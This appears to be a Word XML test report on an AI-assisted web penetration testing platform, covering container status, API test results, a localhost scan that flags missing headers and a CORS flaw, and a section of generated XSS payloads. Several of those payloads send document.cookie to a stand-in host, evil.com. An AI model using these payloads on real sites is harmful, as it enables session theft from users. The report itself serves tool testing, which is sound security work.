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Web应用渗透测试智能辅助系统 - 综合测试报告</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Microsoft YaHei" w:hAnsi="Microsoft YaHei" w:eastAsia="Microsoft YaHei"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>测试时间: 2026-04-18 05:54:47</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Microsoft YaHei" w:hAnsi="Microsoft YaHei" w:eastAsia="Microsoft YaHei"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>报告生成时间: 2026-04-18 05:55:11</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Microsoft YaHei" w:hAnsi="Microsoft YaHei" w:eastAsia="Microsoft YaHei"/>
        </w:rPr>
        <w:t>1. 测试概要</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Microsoft YaHei" w:hAnsi="Microsoft YaHei" w:eastAsia="Microsoft YaHei"/>
          <w:b/>
          <w:color w:val="008000"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>API接口测试: 21/21 通过</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Microsoft YaHei" w:hAnsi="Microsoft YaHei" w:eastAsia="Microsoft YaHei"/>
          <w:b/>
          <w:color w:val="008000"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Docker工具测试: 6/6 通过</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Microsoft YaHei" w:hAnsi="Microsoft YaHei" w:eastAsia="Microsoft YaHei"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>容器运行状态: 9/9 运行中</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Microsoft YaHei" w:hAnsi="Microsoft YaHei" w:eastAsia="Microsoft YaHei"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>API总响应时间: 49400ms</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Microsoft YaHei" w:hAnsi="Microsoft YaHei" w:eastAsia="Microsoft YaHei"/>
        </w:rPr>
        <w:t>2. 系统环境信息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2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CPU使用率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1.8%</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4323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CPU核心数</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4323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CPU频率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2300 MHz</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4323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内存总量</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4323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15.68 GB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内存使用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10.17 GB (64.9%)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4323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磁盘总量</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4323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416.67 GB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磁盘使用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246.13 GB (59.1%)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4323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网络发送</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4323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108.5 MB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网络接收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1226.0 MB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3. 进程资源占用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进程名</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="216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实例数</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="216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总内存占用</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="216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PID列表</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr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python.exe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134.7 MB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1096, 3016, 3892, 3920, 21708</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr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node.exe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33.6 MB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27340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4. Docker容器状态</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Microsoft YaHei" w:hAnsi="Microsoft YaHei" w:eastAsia="Microsoft YaHei"/>
        </w:rPr>
        <w:t>4.1 容器运行状态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容器名</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="216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镜像</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="216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16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pentest-sslscan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pentest-sslscan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Running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Up 29 minutes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr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pentest-dirsearch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pentest-dirsearch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Running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Up 32 minutes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr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pentest-nikto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frapsoft/nikto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Running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Up 36 minutes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr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pentest-metasploit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metasploitframework/metasploit-framework:latest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Running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Up 36 minutes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr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pentest-owasp-zap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zaproxy/zap-stable:latest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Running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Up 36 minutes (unhealthy)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr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pentest-metasploit-db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postgres:15-alpine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Running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Up 36 minutes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr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pentest-sqlmap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pentest-sqlmap:latest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Running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Up 36 minutes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr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pentest-amass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caffix/amass:latest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Running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Up 36 minutes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr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pentest-nmap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instrumentisto/nmap:latest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Running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Up 36 minutes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ocker_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8"/>
        </w:rPr>
        <w:t>图4-1: Docker Desktop容器运行状态</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Microsoft YaHei" w:hAnsi="Microsoft YaHei" w:eastAsia="Microsoft YaHei"/>
        </w:rPr>
        <w:t>4.2 容器资源占用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容器名</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1729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CPU占用</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1729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内存使用</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1729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内存占比</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1729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网络IO</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr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pentest-sslscan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0.00%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1.398MiB / 7.591GiB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0.02%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872B / 126B</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr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pentest-dirsearch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0.00%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13.08MiB / 7.591GiB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0.17%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1.09kB / 126B</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr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pentest-nikto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0.00%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39.24MiB / 7.591GiB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0.50%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2.31kB / 126B</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr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pentest-metasploit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0.00%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456KiB / 7.591GiB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0.01%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1.63kB / 126B</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr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pentest-owasp-zap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0.38%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506.5MiB / 7.591GiB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6.52%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19.1kB / 7.07kB</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr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pentest-metasploit-db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0.02%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19.12MiB / 7.591GiB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0.25%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1.55kB / 126B</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr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pentest-sqlmap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0.00%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21.79MiB / 7.591GiB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0.28%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1.8kB / 126B</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr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pentest-amass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0.00%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15.14MiB / 7.591GiB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0.19%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1.84kB / 126B</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr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pentest-nmap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0.00%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5.652MiB / 7.591GiB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0.07%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1.89kB / 126B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5. API接口测试结果</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Microsoft YaHei" w:hAnsi="Microsoft YaHei" w:eastAsia="Microsoft YaHei"/>
        </w:rPr>
        <w:t>5.1 Python侦察工具API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接口名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响应时间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响应大小(B)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安全数据</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr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WHOIS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881ms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205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DNS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928ms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103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Security Headers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805ms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1461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Score: 0/100</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr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Port Check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18564ms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102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Open: 1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr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CORS Check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757ms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409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Vulnerable: True</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr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Cookie Check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760ms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108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Cookies: 0, Issues: 0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr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Tech Detect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737ms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204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Detected: 1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr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Subdomain Enum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5824ms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107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Found: 0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr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WAF Detect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766ms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122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WAF: False</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr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XSS Payloads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732ms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1389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Total: 23</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr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Full Audit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10867ms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594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Score: 42/100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5.2 核心系统API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接口名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响应时间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响应大小(B)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Health Check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821ms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Reports List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754ms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224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Chat Models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733ms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291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Models: 3</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr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Chat Sessions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745ms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991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MCP Health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760ms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233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Tools: 10</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr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MCP Tools List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756ms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3515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Registered: 10</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr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Index Page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746ms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50527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Chat Page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864ms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25945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Dashboard Page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811ms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  <w:t>25060</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1441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Knowledge Page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788ms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26379</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="144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6. Docker工具执行测试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1729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容器</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1729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729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执行时间</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1729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输出摘要</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr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Nmap Version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pentest-nmap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171ms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Nmap version 7.98 ( https://nmap.org ) Platform: x86_64-unknown-linux-gnu Compil</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr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Amass Version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pentest-amass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197ms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v4.2.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr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SQLmap Version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pentest-sqlmap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575ms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1.10.4.3#dev</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr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Nikto Version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pentest-nikto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257ms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--------------------------------------------------------------------------- Nikt</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr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Dirsearch Help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pentest-dirsearch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283ms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Usage: dirsearch [-u|--url] target [-e|--extensions] extensions [options]  Optio</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr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SSLscan Help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pentest-sslscan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161ms</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1729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 xml:space="preserve">[1;34m                   _            ___ ___| |___  ___ __ _ _ __           / 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7. 安全检测专业数据分析</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Microsoft YaHei" w:hAnsi="Microsoft YaHei" w:eastAsia="Microsoft YaHei"/>
        </w:rPr>
        <w:t>7.1 安全头检测详情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安全头</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="216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16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严重性</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="216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HSTS (Strict-Transport-Security)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Missing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High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N/A</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr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CSP (Content-Security-Policy)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Missing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High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N/A</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr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X-Frame-Options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Missing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Medium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N/A</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr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X-Content-Type-Options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Missing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Medium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N/A</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr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X-XSS-Protection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Missing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Low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N/A</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr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Referrer-Policy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Missing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Low</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2161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N/A</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr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Permissions-Policy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Missing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Low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8"/>
              </w:rPr>
              <w:t>N/A</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Microsoft YaHei" w:hAnsi="Microsoft YaHei" w:eastAsia="Microsoft YaHei"/>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>安全评分: 0/100 | 缺失: 7项 | 服务器: uvicorn</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Microsoft YaHei" w:hAnsi="Microsoft YaHei" w:eastAsia="Microsoft YaHei"/>
        </w:rPr>
        <w:t>7.2 CORS跨域配置分析</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Microsoft YaHei" w:hAnsi="Microsoft YaHei" w:eastAsia="Microsoft YaHei"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>ACAO: https://evil-cors-test.com</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Microsoft YaHei" w:hAnsi="Microsoft YaHei" w:eastAsia="Microsoft YaHei"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>ACAC: true</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Microsoft YaHei" w:hAnsi="Microsoft YaHei" w:eastAsia="Microsoft YaHei"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>存在漏洞: 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严重性</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="432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问题描述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Critical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CORS反射任意Origin(https://evil-cors-test.com)，存在严重跨域攻击风险</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4323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Critical</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4323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CORS允许携带凭证且开放跨域，可窃取用户敏感数据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7.3 端口扫描结果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端口</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="432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445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SMB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扫描端口数: 23 | 目标: 127.0.0.1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Microsoft YaHei" w:hAnsi="Microsoft YaHei" w:eastAsia="Microsoft YaHei"/>
        </w:rPr>
        <w:t>7.4 技术栈指纹识别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288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版本/详情</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="288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分类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Web Server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uvicorn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Infrastructure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7.5 WAF检测分析</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Microsoft YaHei" w:hAnsi="Microsoft YaHei" w:eastAsia="Microsoft YaHei"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>WAF检测: 未检测到</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Microsoft YaHei" w:hAnsi="Microsoft YaHei" w:eastAsia="Microsoft YaHei"/>
        </w:rPr>
        <w:t>7.6 综合安全审计评分</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Microsoft YaHei" w:hAnsi="Microsoft YaHei" w:eastAsia="Microsoft YaHei"/>
          <w:b/>
          <w:color w:val="FFA500"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>综合安全评分: 42/100 (Medium Risk)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检测项</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="288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288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security_headers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0/100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Missing: 7</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2882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cors</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2882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Vulnerable</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2882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https://evil-test.com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cookies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0 cookies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0 issues</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2882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tech</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2882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uvicorn</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2882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ports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0 open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Checked: 10</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2882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waf</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2882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Not Detected</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2882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8. XSS Payload生成能力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288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88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基础Payload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&lt;script&gt;alert('XSS')&lt;/script&gt;</w:t>
              <w:br/>
              <w:t>&lt;img src=x onerror=alert('XSS')&gt;</w:t>
              <w:br/>
              <w:t>&lt;svg onload=alert('XSS')&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2882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属性注入</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2882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882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" onmouseover="alert('XSS')"</w:t>
              <w:br/>
              <w:t>' onfocus='alert("XSS")' autofocus='</w:t>
              <w:br/>
              <w:t>" onfocus="alert('XSS')" autofocus="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DOM型XSS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#&lt;img src=x onerror=alert('XSS')&gt;</w:t>
              <w:br/>
              <w:t>#"&gt;&lt;script&gt;alert('XSS')&lt;/script&gt;</w:t>
              <w:br/>
              <w:t>javascript:document.location='http://evil.com/?c='+document.cookie</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2882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WAF绕过</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2882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882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&lt;ScRiPt&gt;alert('XSS')&lt;/ScRiPt&gt;</w:t>
              <w:br/>
              <w:t>&lt;img/src=x onerror=alert('XSS')&gt;</w:t>
              <w:br/>
              <w:t>&lt;svg/onload=alert('XSS')&gt;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高级利用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8"/>
              </w:rPr>
              <w:t>&lt;script&gt;fetch('http://evil.com/?c='+document.cookie)&lt;/script&gt;</w:t>
              <w:br/>
              <w:t>&lt;img src=x onerror="new Image().src='http://evil.com/?c='+document.cookie"&gt;</w:t>
              <w:br/>
              <w:t>&lt;svg&gt;&lt;animate onbegin=alert('XSS') attributeName=x&gt;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总计: 23 个Payload | 推荐场景: basic</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Microsoft YaHei" w:hAnsi="Microsoft YaHei" w:eastAsia="Microsoft YaHei"/>
        </w:rPr>
        <w:t>9. 性能指标汇总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2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平均响应时间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2352.4ms</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4323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最快响应</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4323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732.4ms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最慢响应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18564.0ms</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4323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总测试时间</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4323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49400ms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通过率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18"/>
              </w:rPr>
              <w:t>21/21 (100.0%)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4323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容器可用率</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4323"/>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Microsoft YaHei" w:hAnsi="Microsoft YaHei" w:eastAsia="Microsoft YaHei"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>9/9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10. 系统界面截图</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Microsoft YaHei" w:hAnsi="Microsoft YaHei" w:eastAsia="Microsoft YaHei"/>
        </w:rPr>
        <w:t>10.1 渗透测试主页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de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8"/>
        </w:rPr>
        <w:t>图10-1: 渗透测试控制台主页</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Microsoft YaHei" w:hAnsi="Microsoft YaHei" w:eastAsia="Microsoft YaHei"/>
        </w:rPr>
        <w:t>10.2 安全仪表盘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8"/>
        </w:rPr>
        <w:t>图10-2: 安全仪表盘 - 综合审计与评分</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Microsoft YaHei" w:hAnsi="Microsoft YaHei" w:eastAsia="Microsoft YaHei"/>
        </w:rPr>
        <w:t>10.3 漏洞知识库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knowled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8"/>
        </w:rPr>
        <w:t>图10-3: OWASP Top 10漏洞知识库</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Microsoft YaHei" w:hAnsi="Microsoft YaHei" w:eastAsia="Microsoft YaHei"/>
        </w:rPr>
        <w:t>10.4 AI安全对话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8"/>
        </w:rPr>
        <w:t>图10-4: AI安全对话页面</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Microsoft YaHei" w:hAnsi="Microsoft YaHei" w:eastAsia="Microsoft YaHei"/>
        </w:rPr>
        <w:t>10.5 API文档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pi_do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8"/>
        </w:rPr>
        <w:t>图10-5: FastAPI自动生成的API文档</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Microsoft YaHei" w:hAnsi="Microsoft YaHei" w:eastAsia="Microsoft YaHei"/>
        </w:rPr>
        <w:t>10.6 Docker容器运行状态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ocker_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8"/>
        </w:rPr>
        <w:t>图10-6: Docker Desktop容器运行状态</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Microsoft YaHei" w:hAnsi="Microsoft YaHei" w:eastAsia="Microsoft YaHei"/>
        </w:rPr>
        <w:t>10.7 终端服务运行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rminal_mc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8"/>
        </w:rPr>
        <w:t>图10-7: MCP服务与后端服务运行状态</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Microsoft YaHei" w:hAnsi="Microsoft YaHei" w:eastAsia="Microsoft YaHei"/>
        </w:rPr>
        <w:t>11. 测试结论</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Microsoft YaHei" w:hAnsi="Microsoft YaHei" w:eastAsia="Microsoft YaHei"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>本次测试共执行 21 个API接口测试和 6 个Docker工具测试。API测试通过率为 100.0%，Docker容器 9/9 正常运行，工具执行测试 6/6 通过。系统整体功能正常，安全检测工具链完整，可满足Web应用渗透测试需求。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